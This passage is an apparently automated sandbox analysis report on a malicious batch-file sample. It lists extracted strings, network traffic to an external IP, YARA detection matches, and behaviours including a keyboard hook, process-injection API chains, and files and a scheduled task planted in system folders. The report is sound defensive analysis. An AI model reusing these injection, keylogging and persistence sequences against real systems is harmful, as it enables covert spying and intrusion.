Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000000.2769648555.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: Amcache.hve.11.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000019.00000002.3432949177.0000021404730000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co.1mmi
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.8.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2775061134.000001B4A5B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 59173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59173
Source: unknown HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Found large BAT file
Source: rbx-CO2.bat Static file information: 5214429
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE0C8 NtUnmapViewOfSection, 36_2_00007FFD343EE0C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE122 NtSetContextThread, 36_2_00007FFD343EE122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE142 NtResumeThread, 36_2_00007FFD343EE142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE0FA NtWriteVirtualMemory, 36_2_00007FFD343EE0FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE0A8 NtUnmapViewOfSection, 36_2_00007FFD343EE0A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F0C7D NtWriteVirtualMemory, 36_2_00007FFD343F0C7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE098 NtUnmapViewOfSection, 36_2_00007FFD343EE098
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE132 NtSetContextThread, 36_2_00007FFD343EE132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F0A5E NtUnmapViewOfSection, 36_2_00007FFD343F0A5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F0F40 NtSetContextThread, 36_2_00007FFD343F0F40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343F1004 NtResumeThread, 36_2_00007FFD343F1004
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 39_2_000002D0165E2C80
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_f4o4oimb.n1j.ps1
Detected potential crypto function
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3DCC94 17_3_00000253FC3DCC94
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3DCE18 17_3_00000253FC3DCE18
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3D23F0 17_3_00000253FC3D23F0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40D894 17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40DA18 17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC402FF0 17_2_00000253FC402FF0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43D894 17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43DA18 17_2_00000253FC43DA18
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC432FF0 17_2_00000253FC432FF0
Source: C:\Windows\System32\conhost.exe Code function: 18_3_000002A5AF33CC94 18_3_000002A5AF33CC94
Source: C:\Windows\System32\conhost.exe Code function: 18_3_000002A5AF3323F0 18_3_000002A5AF3323F0
Source: C:\Windows\System32\conhost.exe Code function: 18_3_000002A5AF33CE18 18_3_000002A5AF33CE18
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36D894 18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF362FF0 18_2_000002A5AF362FF0
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36DA18 18_2_000002A5AF36DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EDD78 36_2_00007FFD343EDD78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E6CE5 36_2_00007FFD343E6CE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E9DA8 36_2_00007FFD343E9DA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E25DD 36_2_00007FFD343E25DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EE349 36_2_00007FFD343EE349
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E3AFB 36_2_00007FFD343E3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E2EF2 36_2_00007FFD343E2EF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E36F1 36_2_00007FFD343E36F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E2775 36_2_00007FFD343E2775
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD34666B0D 36_2_00007FFD34666B0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD34666F01 36_2_00007FFD34666F01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD34664FD1 36_2_00007FFD34664FD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD34665442 36_2_00007FFD34665442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD34660000 36_2_00007FFD34660000
Source: C:\Windows\System32\conhost.exe Code function: 37_3_000001780D3E23F0 37_3_000001780D3E23F0
Source: C:\Windows\System32\conhost.exe Code function: 37_3_000001780D3ECE18 37_3_000001780D3ECE18
Source: C:\Windows\System32\conhost.exe Code function: 37_3_000001780D3ECC94 37_3_000001780D3ECC94
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD22FF0 37_2_000001780DD22FF0
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2DA18 37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2D894 37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe Code function: 38_3_0000020175E8CE18 38_3_0000020175E8CE18
Source: C:\Windows\System32\dllhost.exe Code function: 38_3_0000020175E8CC94 38_3_0000020175E8CC94
Source: C:\Windows\System32\dllhost.exe Code function: 38_3_0000020175E823F0 38_3_0000020175E823F0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140001CF0 38_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002D4C 38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140003204 38_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002434 38_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140001274 38_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBDA18 38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBD894 38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EB2FF0 38_2_0000020175EB2FF0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EEDA18 38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EED894 38_2_0000020175EED894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EE2FF0 38_2_0000020175EE2FF0
Source: C:\Windows\System32\winlogon.exe Code function: 39_3_000002D0165823F0 39_3_000002D0165823F0
Source: C:\Windows\System32\winlogon.exe Code function: 39_3_000002D01658CC94 39_3_000002D01658CC94
Source: C:\Windows\System32\winlogon.exe Code function: 39_3_000002D01658CE18 39_3_000002D01658CE18
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E2FF0 39_2_000002D0165E2FF0
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ED894 39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165EDA18 39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D016612FF0 39_2_000002D016612FF0
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661D894 39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661DA18 39_2_000002D01661DA18
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2683
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5477
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2683 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}(
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4lt
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exeh
Source: System.evtx.49.dr Binary string: C:\Device\HarddiskVolume3`&
Source: System.evtx.49.dr Binary string: C:\Device\HarddiskVolume3
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP**
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr Binary string: N\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe8
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4A
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine Classification label: mal100.spyw.evad.winBAT@56/86@2/2
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 38_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\3259231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\4569933
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\2180219
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5828:120:WilError_03
